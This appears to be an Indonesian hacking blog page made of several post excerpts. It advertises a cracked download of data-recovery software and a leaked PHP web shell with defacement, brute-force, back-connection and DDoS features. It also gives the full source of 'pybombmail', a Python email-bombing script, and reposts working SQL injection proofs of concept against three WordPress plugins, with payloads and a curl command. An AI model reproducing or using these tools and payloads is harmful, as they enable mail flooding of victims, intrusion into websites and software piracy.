Download GetDataBack v4.25

Do-it-yourself Data Recovery Software

GetDataBack is more than an undelete or file recovery program or a system restore:
Whatever happened to your drive-

GetDataBack will recover your data if the hard drive's partition table, boot record, FAT/MFT or root directory are lost or damaged, data was lost due to a virus attack, the drive was formatted, fdisk has been run, a power failure has caused a system crash, files were lost due to a software failure, files were accidentally deleted...

Recover even when Windows doesn't recognize the drive-

GetDataBack can even recover your data when the drive is no longer recognized by Windows. It can likewise be used even if all directory information - not just the root directory- is missing.

Get everything back-

Advanced algorithms will make sure that all directories and sub directories are put together as they were, and that long file names are reconstructed correctly.

GetDataBack is safe-

GetDataBack is read-only, meaning the program will never attempt to write to the drive you are about to recover. Please make sure to read the safety instructions...

GetDataBack is easy to use-

The software enables the regular user to conduct his own data recovery by guiding him through three easy to understand steps, thus gives the advanced user the possibility to interfere with the recovery and improve the results, by examining the scan log, the file system details, file and directory information, by selecting the sector range to be scanned, by choosing excessive search for file systems or search for lost files, by calling Runtime's DiskExplorer.

Recover files over your local network or over a serial cable-

This feature enables you to run GetDataBack on one computer ("remote") while accessing the drives of another computer ("host").

Recovering data over a network is useful, especially when you are not able to remove the drive you want to recover from and attach it to another computer.

Just download HDHost and install it on the computer you want to recover data from. Click here for further instructions...

Please note: Installing HDHost or any other programs on the drive you want to recover from, can cause data on that drive to be overwritten.

If at all possible, we always recommend to attach the drive as a second drive to a working computer and run the data recovery software from there.


New
Step by Step Guide: Doing a Data Recovery with GetDataBack

New
You can run GetDataBack from a WinPE boot CD-ROM.

New
GetDataBack now supports Unicode.

Now you can recover files whose names are encoded in non-standard character sets. This includes all Unicode character sets, such as Japanese, Chinese, Korean, Russian, Greek... We recommend to perform the data recovery on an NT/XP computer because Win9x/ME does not fully support Unicode.

download Get Data Back New Version.rar + crack

Lanjut Baca....

Best Shell From Andha Hacker

SyRiAn Shell V7 - priv8! - LEAKED! ! ! !

--Features;
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
-- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDOS Attacke

AND MANY MORE FEATURES

Source : here

Special Thank to Andha Hacker

Lanjut Baca....

pybombmail.py

how to... huhuhu


berikut script pythonnya 
(FIX, now with AOL mail):p


#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!


import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')




to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')


if server == 'gmail':
        smtp_server = 'smtp.gmail.com'
        port = 587
elif server == 'yahoo':
        smtp_server = 'smtp.mail.yahoo.com'
        port = 25

elif server == 'aol':
        smtp_server = 'smtp.aol.com'
        port = 587

else:
        print 'Applies only to gmail,yahoo and aol. Visit www.kendari-underground.blogspot.com'
        sys.exit()


print ''


try:
        server = smtplib.SMTP(smtp_server,port)
        server.ehlo()
        if smtp_server == "smtp.gmail.com":
                server.starttls()
        server.login(user,passwd)
        for i in range(1, total+1):
                subject = os.urandom(9)
                msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
                server.sendmail(user,to,msg)
                print "\rTotal emails sent: %i" % i
                sys.stdout.flush()
        server.quit()
        print '\n Done !!!'
except KeyboardInterrupt:
        print '[-] Canceled'
        sys.exit()
except smtplib.SMTPAuthenticationError:
        print '\n[!] The username or password you entered is incorrect. FUCKYOU!!!'
        sys.exit()
#http://abi71.wordpress.com/2011/02/03/pybombmail-py/




cara menggunakan sbb :p

#os, opensuse 12.1 :p
#segala bentuk kerusakan yang di timbulkan anda tanggung sendiri.

Lanjut Baca....

Celah SQL Injection Pada Plugin WordPress Contact Form <= 2.7.5

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

# Date: 2011-10-13

# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)

# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip

# Version: 2.7.5 (tested)

---------------

PoC (POST data)

---------------

http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php

wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.

curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

---------------

Vulnerable code

---------------

Line 49:

public function the_content($content) {

global $wpdb;

global $table_name;

global $settings_table_name;

$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {

$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------

Patch

---------------

*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400

--- ./easy-form.class.php   2011-10-13 19:51:21.442799615 -0400

***************

*** 54,61 ****

$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {

!

!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

$continue = true;

--- 54,63 ----

$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {

!               $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];

!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);

!

!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

$continue = true;

***************

*** 71,80 ****

if ($continue) {

//loop through the fields of this form (read from DB) and build the message here

!                 $form_fields = $wpdb->get_results("

SELECT *

FROM $settings_table_name

!                   WHERE form_id = ".$_POST['wpcf_easyform_formid']."

ORDER BY position

");

--- 73,82 ----

if ($continue) {

//loop through the fields of this form (read from DB) and build the message here

!       $form_fields = $wpdb->get_results("

SELECT *

FROM $settings_table_name

!                   WHERE form_id = ".$wpcf_easyform_formid."

ORDER BY position

                ");

Sumber :http://www.exploit-db.com/exploits/17980/

Lanjut Baca....

WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability

#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]

#Date: 2011-09-25

#Author: [cheki]

#Version:[3.2.1]

#Tested on:[linux]

#Used: ["sqlmap"]

#SQL Injection

http:///wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM

mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)

#Home page: http://hacking.ge/
Sumber :http://www.exploit-db.com/exploits/17970/

Lanjut Baca....

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection

# Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability

# Date: 2011-09-26

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip

# Version: 1.9.10 (tested)

# Note: magic_quotes has to be turned off

---

PoC

---

http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------

Vulnerable code

---------------

./export.php

require_once("./code/cls/export.php");

...

if (isset($_GET["ex"])) {

$export_type = $_GET["ex"];

...

switch($export_type) {

case "user":

header('Content-type: text/csv');

header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');

$sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);

$rows = $wpdb->get_results($sql, ARRAY_N);

./code/cls/export.php

class GDSRExport {

...

function export_users($user_data = "min", $data_export = "article", $get_data = array()) {

...

$where = array();

...

$where[] = "v.vote_type = '".$data_export."'";

...

$j_where = join(" and ", $where);

...

return sprintf("select %s from %s where %s order by u.id",

                    $j_select, $j_tables, $j_where);
Sumber :http://www.exploit-db.com/exploits/17973/

Lanjut Baca....

Disable Proteksi Klik Kanan Website www.topan.web.id

Sebel ga sih kamiu, udh baca artikel nih ya, lalu di dalemnya ada script untuk di praktekin tapi web ini malah pake proteksi klik kanan java script 0_o, (kok jadi curhat sih :P).


website yang menggunakan proteksi klik kanan tersebut adalah web mas topan --> http://topan.web.id/, saya iseng2 masuk untuk membaca sebuah artikel download video youtube tanpa software  , (kebetulan kemaren ane lagi ngebet banget pengen donlot lagunya jon lenong 0_o). saat pengen praktek, eh ternyata eh ternyata :p. met nahh... (kata orang kendari).


saya coba untuk disable java script di firefox (kebetulan kemarin pake seri 6.0.1) tanda contreng non aktifkan tools,option,content, enable java script, hasilnya nihil (mungkin karena seri fxnya.setelah coba googling ternyata tidak ditemukan jalan keluarnya.


iseng2 coba pake chrome (ane firefox addict, jadi jarang pake FX) ane masup di menu settingannya (lihat ss)

dan hasilnya

semoga bermanfaat, salam merdeka XD :P

berikut script download youtube yang saya ceritakan di atas

Download Video Youtube dengan kualitas “Regular Quality” (RQ)
javascript:window.location.href = ‘http://youtube.com/get_video?video_id=’ + yt.getConfig(‘SWF_ARGS’)['video_id'] + “&l=” + yt.getConfig(‘SWF_ARGS’)['l'] + “&sk=” + yt.getConfig(‘SWF_ARGS’)['sk'] + ‘&t=’ + yt.getConfig(‘SWF_ARGS’)['t'];


Download Video Youtube dengan kualitas “High Quality” (HQ)
javascript:window.location.href = ‘http://youtube.com/get_video?video_id=’ + yt.getConfig(‘SWF_ARGS’)['video_id'] + “&fmt=18&l=” + yt.getConfig(‘SWF_ARGS’)['l'] + “&sk=” + yt.getConfig(‘SWF_ARGS’)['sk'] + ‘&t=’ + yt.getConfig(‘SWF_ARGS’)['t'];


Download Video Youtube dengan kualitas “High Definition” (HD)
javascript:window.location.href = ‘http://youtube.com/get_video?video_id=’ + yt.getConfig(‘SWF_ARGS’)['video_id'] + “&fmt=22&l=” + yt.getConfig(‘SWF_ARGS’)['l'] + “&sk=” + yt.getConfig(‘SWF_ARGS’)['sk'] + ‘&t=’ + yt.getConfig(‘SWF_ARGS’)['t'];

Lanjut Baca....